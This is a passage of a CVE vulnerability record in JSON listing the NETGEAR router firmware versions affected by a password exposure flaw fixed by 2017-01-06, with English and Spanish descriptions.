"cpe:2.3:h:netgear:dgn2200:v1:*:*:*:*:*:*:*", "matchCriteriaId": "F50D834B-D7B3-43D6-8072-8992FBC8C97B", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:netgear:dgn2200_firmware:*:*:*:*:*:*:*:*", "matchCriteriaId": "769065AA-BC73-4674-87B0-3D514FEFDBEF", "versionEndExcluding": "2017-01-06", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:netgear:dgn2200:v3:*:*:*:*:*:*:*", "matchCriteriaId": "509F9F22-24E7-45E9-AB96-17F8B50813F5", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:netgear:dgn2200_firmware:*:*:*:*:*:*:*:*", "matchCriteriaId": "769065AA-BC73-4674-87B0-3D514FEFDBEF", "versionEndExcluding": "2017-01-06", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:netgear:dgn2200:v4:*:*:*:*:*:*:*", "matchCriteriaId": "099184A0-F1C6-4C3F-9C3B-F0B9AC0D4D14", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:netgear:dgn2200b_firmware:*:*:*:*:*:*:*:*", "matchCriteriaId": "5158CF4D-80FC-44FD-B9DA-442FA3A1A913", "versionEndExcluding": "2017-01-06", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:netgear:dgn2200b:v3:*:*:*:*:*:*:*", "matchCriteriaId": "8A4EE9AB-F3DE-4EA8-8344-7F62288EC921", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:netgear:dgn2200b_firmware:*:*:*:*:*:*:*:*", "matchCriteriaId": "5158CF4D-80FC-44FD-B9DA-442FA3A1A913", "versionEndExcluding": "2017-01-06", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:netgear:dgn2200b:v4:*:*:*:*:*:*:*", "matchCriteriaId": "25090794-A90C-40CD-8E95-87EC4E98B928", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:netgear:dgnd3700_firmware:*:*:*:*:*:*:*:*", "matchCriteriaId": "696689E8-E4C4-4A92-9D00-4C6B8CA80448", "versionEndExcluding": "2017-01-06", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:netgear:dgnd3700:v1:*:*:*:*:*:*:*", "matchCriteriaId": "8A5971C6-2F27-4715-BC9E-378B647611D8", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:netgear:dgnd3700_firmware:*:*:*:*:*:*:*:*", "matchCriteriaId": "696689E8-E4C4-4A92-9D00-4C6B8CA80448", "versionEndExcluding": "2017-01-06", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:netgear:dgnd3700:v2:*:*:*:*:*:*:*", "matchCriteriaId": "7A8F0B8E-D3F2-43C9-8B12-43DE4226E826", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:netgear:dgnd3700b_firmware:*:*:*:*:*:*:*:*", "matchCriteriaId": "E607B102-4151-4829-B5D5-779D096D620F", "versionEndExcluding": "2017-01-06", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:netgear:dgnd3700b:v2:*:*:*:*:*:*:*", "matchCriteriaId": "C6F2634F-EA5A-48CE-91BA-964C0B40AF8E", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:netgear:jnr1010_firmware:*:*:*:*:*:*:*:*", "matchCriteriaId": "9F19C07A-65D3-4FFF-9D11-58C2B4D7A531", "versionEndExcluding": "2017-01-06", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:netgear:jnr1010:v1:*:*:*:*:*:*:*", "matchCriteriaId": "B4196FE8-4491-442C-96A0-23495165D3B9", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:netgear:jnr1010_firmware:*:*:*:*:*:*:*:*", "matchCriteriaId": "9F19C07A-65D3-4FFF-9D11-58C2B4D7A531", "versionEndExcluding": "2017-01-06", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:netgear:jnr1010:v2:*:*:*:*:*:*:*", "matchCriteriaId": "CCE79B3F-8667-43C9-962D-EE089428F144", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:netgear:jnr3300_firmware:*:*:*:*:*:*:*:*", "matchCriteriaId": "D5738544-7D8A-45AD-99F3-6F92C6886ACD", "versionEndExcluding": "2017-01-06", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:netgear:jnr3300:-:*:*:*:*:*:*:*", "matchCriteriaId": "64CA12CC-48D8-4510-983C-8350A87CD5D2", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:netgear:jr6100_firmware:*:*:*:*:*:*:*:*", "matchCriteriaId": "30751D8C-301D-4C9F-8512-E887512CE388", "versionEndExcluding": "2017-01-06", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:netgear:jr6100:-:*:*:*:*:*:*:*", "matchCriteriaId": "2C1C81B4-033E-4F44-9D17-27B04FCF8EF4", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:netgear:jr6150_firmware:*:*:*:*:*:*:*:*", "matchCriteriaId": "0AF8ACF6-2BDF-49C2-B92F-2207D83664BF", "versionEndExcluding": "2017-01-06", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:netgear:jr6150:-:*:*:*:*:*:*:*", "matchCriteriaId": "D67167E5-81D2-4892-AF41-CBB6271232D1", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:netgear:jwnr2000_firmware:*:*:*:*:*:*:*:*", "matchCriteriaId": "86B79A3A-8A63-4BD5-9016-8C98AEF737A8", "versionEndExcluding": "2017-01-06", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:netgear:jwnr2000:v5:*:*:*:*:*:*:*", "matchCriteriaId": "3D78543E-37A7-4829-9165-D0CF52DD4867", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:netgear:r2000_firmware:*:*:*:*:*:*:*:*", "matchCriteriaId": "7D0BCC15-918E-4A31-A943-C5B72CB117E9", "versionEndExcluding": "2017-01-06", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:netgear:r2000:-:*:*:*:*:*:*:*", "matchCriteriaId": "9B1D13C3-5663-447F-9FD9-71EBEC471DAF", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:netgear:r6050_firmware:*:*:*:*:*:*:*:*", "matchCriteriaId": "675EBB75-3DB8-45D7-9512-5D297C680750", "versionEndExcluding": "2017-01-06", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:netgear:r6050:-:*:*:*:*:*:*:*", "matchCriteriaId": "363D4DEE-98B9-4294-B241-1613CAD1A3A7", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:netgear:r6100_firmware:*:*:*:*:*:*:*:*", "matchCriteriaId": "067085C6-EA5C-430B-B81E-A5809BD047B0", "versionEndExcluding": "2017-01-06", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:netgear:r6100:-:*:*:*:*:*:*:*", "matchCriteriaId": "9F44A123-B256-428B-98C2-17570F2F32DC", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:netgear:r6200_firmware:*:*:*:*:*:*:*:*", "matchCriteriaId": "ECBBDBEC-C896-4130-933B-150DB17662A3", "versionEndExcluding": "2017-01-06", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:netgear:r6200:-:*:*:*:*:*:*:*", "matchCriteriaId": "8A466B29-3ADA-46D9-824C-8DF9160B7DD7", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:netgear:r6200_firmware:*:*:*:*:*:*:*:*", "matchCriteriaId": "ECBBDBEC-C896-4130-933B-150DB17662A3", "versionEndExcluding": "2017-01-06", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:netgear:r6200:v2:*:*:*:*:*:*:*", "matchCriteriaId": "719248B0-BE22-4836-A23E-FE9F7590FB0C", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:netgear:r6220_firmware:*:*:*:*:*:*:*:*", "matchCriteriaId": "717CDDCB-3DEB-4949-AAC8-D939D01A0858", "versionEndExcluding": "2017-01-06", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:netgear:r6220:-:*:*:*:*:*:*:*", "matchCriteriaId": "B131B5C8-CB7F-433B-BA32-F05CE0E92A66", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:netgear:r6250_firmware:*:*:*:*:*:*:*:*", "matchCriteriaId": "760BD171-837C-4D36-A4AF-551E926B53C0", "versionEndExcluding": "2017-01-06", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:netgear:r6250:-:*:*:*:*:*:*:*", "matchCriteriaId": "321BE843-52C4-4638-A321-439CA7B3A6F2", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:netgear:r6300_firmware:*:*:*:*:*:*:*:*", "matchCriteriaId": "AC7F9A44-CC92-4E00-A274-ADA08469F33F", "versionEndExcluding": "2017-01-06", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:netgear:r6300:-:*:*:*:*:*:*:*", "matchCriteriaId": "9597966A-B13C-4098-838B-EC9AA8DE443D", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:netgear:r6300_firmware:*:*:*:*:*:*:*:*", "matchCriteriaId": "AC7F9A44-CC92-4E00-A274-ADA08469F33F", "versionEndExcluding": "2017-01-06", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:netgear:r6300:v2:*:*:*:*:*:*:*", "matchCriteriaId": "10938043-F7DF-42C3-8C16-F92CAF8E5576", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:netgear:r6700_firmware:*:*:*:*:*:*:*:*", "matchCriteriaId": "66DBD436-0DA8-4917-99EB-6A5D0C3D42D1", "versionEndExcluding": "2017-01-06", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:netgear:r6700:-:*:*:*:*:*:*:*", "matchCriteriaId": "21B27F11-4262-4CE1-8107-B365A7C152F2", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:netgear:r7000_firmware:*:*:*:*:*:*:*:*", "matchCriteriaId": "9D2356B7-389D-4612-8DBE-00C6AC35BD3D", "versionEndExcluding": "2017-01-06", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:netgear:r7000:-:*:*:*:*:*:*:*", "matchCriteriaId": "C9F86FF6-AB32-4E51-856A-DDE790C0A9A6", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:netgear:r7500_firmware:*:*:*:*:*:*:*:*", "matchCriteriaId": "9866D7B9-622A-4B25-8CFA-D31AB4406A4F", "versionEndExcluding": "2017-01-06", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:netgear:r7500:-:*:*:*:*:*:*:*", "matchCriteriaId": "EF3B3F26-401C-4ED0-B871-4B4F8521F369", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:netgear:r7900_firmware:*:*:*:*:*:*:*:*", "matchCriteriaId": "2BC36898-99C5-4755-9C42-687EAC07013B", "versionEndExcluding": "2017-01-06", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:netgear:r7900:-:*:*:*:*:*:*:*", "matchCriteriaId": "C484840F-AF30-4B5C-821A-4DB9BE407BDB", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:netgear:r8000_firmware:*:*:*:*:*:*:*:*", "matchCriteriaId": "1BBF5B80-58EB-467E-8E07-6CB6C2E88BBC", "versionEndExcluding": "2017-01-06", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:netgear:r8000:-:*:*:*:*:*:*:*", "matchCriteriaId": "5B39F095-8FE8-43FD-A866-7B613B495984", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:netgear:wgr614_firmware:*:*:*:*:*:*:*:*", "matchCriteriaId": "A746A6A7-AFD5-41DC-B805-C1526CFD2E95", "versionEndExcluding": "2017-01-06", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:netgear:wgr614:v10:*:*:*:*:*:*:*", "matchCriteriaId": "B47B0897-A9B9-4568-84DD-C3CE0118B439", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:netgear:wndr3400_firmware:*:*:*:*:*:*:*:*", "matchCriteriaId": "B2BF93E7-2E14-48C7-BD1A-9C5FC3451334", "versionEndExcluding": "2017-01-06", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:netgear:wndr3400:v2:*:*:*:*:*:*:*", "matchCriteriaId": "25187765-6842-4F6A-BF5E-B2E634A958A0", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:netgear:wndr3400_firmware:*:*:*:*:*:*:*:*", "matchCriteriaId": "B2BF93E7-2E14-48C7-BD1A-9C5FC3451334", "versionEndExcluding": "2017-01-06", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:netgear:wndr3400:v3:*:*:*:*:*:*:*", "matchCriteriaId": "1992E44C-122C-41BC-8FDC-5F9EBEE1FB7C", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:netgear:wndr3700_firmware:*:*:*:*:*:*:*:*", "matchCriteriaId": "17D010FA-275D-4D34-8DB8-49BEA70AF6DA", "versionEndExcluding": "2017-01-06", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:netgear:wndr3700:v3:*:*:*:*:*:*:*", "matchCriteriaId": "A239B4C0-0CD9-4632-A1E3-68B8E39692B3", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:netgear:wndr3700_firmware:*:*:*:*:*:*:*:*", "matchCriteriaId": "17D010FA-275D-4D34-8DB8-49BEA70AF6DA", "versionEndExcluding": "2017-01-06", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:netgear:wndr3700:v4:*:*:*:*:*:*:*", "matchCriteriaId": "257A5E68-8EDC-44F5-A85C-83A91C93CCE5", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:netgear:wndr3700_firmware:*:*:*:*:*:*:*:*", "matchCriteriaId": "17D010FA-275D-4D34-8DB8-49BEA70AF6DA", "versionEndExcluding": "2017-01-06", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:netgear:wndr3700:v5:*:*:*:*:*:*:*", "matchCriteriaId": "EC5B6CB8-D439-42D5-ACAE-6246874EA5F0", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:netgear:wndr4300_firmware:*:*:*:*:*:*:*:*", "matchCriteriaId": "58CC514B-1570-4116-9E1F-289BD9DD5935", "versionEndExcluding": "2017-01-06", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:netgear:wndr4300:-:*:*:*:*:*:*:*", "matchCriteriaId": "1413C591-D066-4FA2-BEB1-6C60F8645F28", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:netgear:wndr4300_firmware:*:*:*:*:*:*:*:*", "matchCriteriaId": "58CC514B-1570-4116-9E1F-289BD9DD5935", "versionEndExcluding": "2017-01-06", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:netgear:wndr4300:v2:*:*:*:*:*:*:*", "matchCriteriaId": "4428B145-B86D-4709-BBA9-64BDE7D35A25", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:netgear:wndr4500_firmware:*:*:*:*:*:*:*:*", "matchCriteriaId": "A3BC4526-3FCE-42D3-B34A-C32060B78AF7", "versionEndExcluding": "2017-01-06", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:netgear:wndr4500:v1:*:*:*:*:*:*:*", "matchCriteriaId": "829C71CF-A1E7-456E-8230-8929BD7E867C", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:netgear:wndr4500_firmware:*:*:*:*:*:*:*:*", "matchCriteriaId": "A3BC4526-3FCE-42D3-B34A-C32060B78AF7", "versionEndExcluding": "2017-01-06", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:netgear:wndr4500:v2:*:*:*:*:*:*:*", "matchCriteriaId": "AB00ECAD-7474-4D85-8248-D014E5808814", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:netgear:wndr4500_firmware:*:*:*:*:*:*:*:*", "matchCriteriaId": "A3BC4526-3FCE-42D3-B34A-C32060B78AF7", "versionEndExcluding": "2017-01-06", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:netgear:wndr4500:v3:*:*:*:*:*:*:*", "matchCriteriaId": "C31D6808-4103-4543-B7AB-84A79CD12006", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:netgear:wnr1000_firmware:*:*:*:*:*:*:*:*", "matchCriteriaId": "17B45AE0-0FBF-478B-966F-B2B28C971C3C", "versionEndExcluding": "2017-01-06", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:netgear:wnr1000:v2:*:*:*:*:*:*:*", "matchCriteriaId": "938F4D22-AEFC-4141-BC1C-101F835D4E77", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:netgear:wnr1000_firmware:*:*:*:*:*:*:*:*", "matchCriteriaId": "17B45AE0-0FBF-478B-966F-B2B28C971C3C", "versionEndExcluding": "2017-01-06", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:netgear:wnr1000:v3:*:*:*:*:*:*:*", "matchCriteriaId": "91D091D4-04EA-4564-A2CC-88E217A9FC08", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:netgear:wnr1000_firmware:*:*:*:*:*:*:*:*", "matchCriteriaId": "17B45AE0-0FBF-478B-966F-B2B28C971C3C", "versionEndExcluding": "2017-01-06", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:netgear:wnr1000:v4:*:*:*:*:*:*:*", "matchCriteriaId": "C8218868-273B-46DB-B636-D3F9A3768069", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:netgear:wnr2000_firmware:*:*:*:*:*:*:*:*", "matchCriteriaId": "CCA254A9-B22D-44C5-9261-19AFBD2B2EE4", "versionEndExcluding": "2017-01-06", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:netgear:wnr2000:v3:*:*:*:*:*:*:*", "matchCriteriaId": "C547734B-BF1A-4CD9-8FD8-9ECB3D15B0BA", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:netgear:wnr2000_firmware:*:*:*:*:*:*:*:*", "matchCriteriaId": "CCA254A9-B22D-44C5-9261-19AFBD2B2EE4", "versionEndExcluding": "2017-01-06", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:netgear:wnr2000:v4:*:*:*:*:*:*:*", "matchCriteriaId": "D2913468-C442-48A3-8AD9-A2F3CCDD7952", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:netgear:wnr2000_firmware:*:*:*:*:*:*:*:*", "matchCriteriaId": "CCA254A9-B22D-44C5-9261-19AFBD2B2EE4", "versionEndExcluding": "2017-01-06", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:netgear:wnr2000:v5:*:*:*:*:*:*:*", "matchCriteriaId": "317F25FF-B3A2-4C68-888F-D2627C564867", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:netgear:wnr2200_firmware:*:*:*:*:*:*:*:*", "matchCriteriaId": "BFCD5179-4D17-4187-BFFD-7FF080804D95", "versionEndExcluding": "2017-01-06", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:netgear:wnr2200:-:*:*:*:*:*:*:*", "matchCriteriaId": "94B74E4A-3E2F-4CB1-B33D-8618ED1C7E9F", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:netgear:wnr2500_firmware:*:*:*:*:*:*:*:*", "matchCriteriaId": "AF1CD0F5-D109-460F-9417-1907A6368A8B", "versionEndExcluding": "2017-01-06", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:netgear:wnr2500:-:*:*:*:*:*:*:*", "matchCriteriaId": "EA9EF618-6194-4127-BD60-FB0E645C8993", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:netgear:wnr3500l_firmware:*:*:*:*:*:*:*:*", "matchCriteriaId": "DDBCEE9B-9189-42DA-86D1-3FF6E4168127", "versionEndExcluding": "2017-01-06", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:netgear:wnr3500l:v2:*:*:*:*:*:*:*", "matchCriteriaId": "C8DE4BFA-41DE-4748-ACC7-14362333A059", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" } ], "cveTags": [], "descriptions": [ { "lang": "en", "value": "Certain NETGEAR devices are affected by password exposure. This affects AC1450 before 2017-01-06, C6300 before 2017-01-06, D500 before 2017-01-06, D1500 before 2017-01-06, D3600 before 2017-01-06, D6000 before 2017-01-06, D6100 before 2017-01-06, D6200 before 2017-01-06, D6200B before 2017-01-06, D6300B before 2017-01-06, D6300 before 2017-01-06, DGN1000v3 before 2017-01-06, DGN2200v1 before 2017-01-06, DGN2200v3 before 2017-01-06, DGN2200V4 before 2017-01-06, DGN2200Bv3 before 2017-01-06, DGN2200Bv4 before 2017-01-06, DGND3700v1 before 2017-01-06, DGND3700v2 before 2017-01-06, DGND3700Bv2 before 2017-01-06, JNR1010v1 before 2017-01-06, JNR1010v2 before 2017-01-06, JNR3300 before 2017-01-06, JR6100 before 2017-01-06, JR6150 before 2017-01-06, JWNR2000v5 before 2017-01-06, R2000 before 2017-01-06, R6050 before 2017-01-06, R6100 before 2017-01-06, R6200 before 2017-01-06, R6200v2 before 2017-01-06, R6220 before 2017-01-06, R6250 before 2017-01-06, R6300 before 2017-01-06, R6300v2 before 2017-01-06, R6700 before 2017-01-06, R7000 before 2017-01-06, R7900 before 2017-01-06, R7500 before 2017-01-06, R8000 before 2017-01-06, WGR614v10 before 2017-01-06, WNR1000v2 before 2017-01-06, WNR1000v3 before 2017-01-06, WNR1000v4 before 2017-01-06, WNR2000v3 before 2017-01-06, WNR2000v4 before 2017-01-06, WNR2000v5 before 2017-01-06, WNR2200 before 2017-01-06, WNR2500 before 2017-01-06, WNR3500Lv2 before 2017-01-06, WNDR3400v2 before 2017-01-06, WNDR3400v3 before 2017-01-06, WNDR3700v3 before 2017-01-06, WNDR3700v4 before 2017-01-06, WNDR3700v5 before 2017-01-06, WNDR4300 before 2017-01-06, WNDR4300v2 before 2017-01-06, WNDR4500v1 before 2017-01-06, WNDR4500v2 before 2017-01-06, and WNDR4500v3 before 2017-01-06." }, { "lang": "es", "value": "Determinados dispositivos de NETGEAR est\u00e1n afectados por una exposici\u00f3n de contrase\u00f1as. Esto afecta a AC1450 hasta el 06-01-2017, C6300 hasta el 06-01-2017, D500 hasta el 06-01-2017, D1500 hasta el 06-01-2017, D3600 hasta el 06-01-2017, D6000 hasta el 06-01-2017, D6100 hasta el 06-01-2017, D6200 hasta el 06-01-2017, D6200B hasta el 06-01-2017, D6300B hasta el 06-01-2017, D6300 hasta el 06-01-2017, DGN1000v3 hasta el 06-01-2017, DGN2200v1 hasta el 06-01-2017, DGN2200v3 hasta el 06-01-2017, DGN2200V4 hasta el 06-01-2017, DGN2200Bv3 hasta el 06-01-2017, DGN2200Bv4 hasta el 06-01-2017, DGND3700v1 hasta el 06-01-2017, DGND3700v2 hasta el 06-01-2017, DGND3700Bv2 hasta el 06-01-2017, JNR1010v1 hasta el 06-01-2017, JNR1010v2 hasta el 06-01-2017, JNR3300 hasta el 06-01-2017, JR6100 hasta el 06-01-2017, JR6150 hasta el 06-01-2017, JWNR2000v5 hasta el 06-01-2017, R2000 hasta el 06-01-2017, R6050 hasta el 06-01-2017, R6100 hasta el 06-01-2017, R6200 hasta el 06-01-2017, R6200v2 hasta el 06-01-2017, R6220 hasta el 06-01-2017, R6250 hasta el 06-01-2017, R6300 hasta el 06-01-2017, R6300v2 hasta el 06-01-2017, R6700 hasta el 06-01-2017, R7000 hasta el 06-01-2017, R7900 hasta el 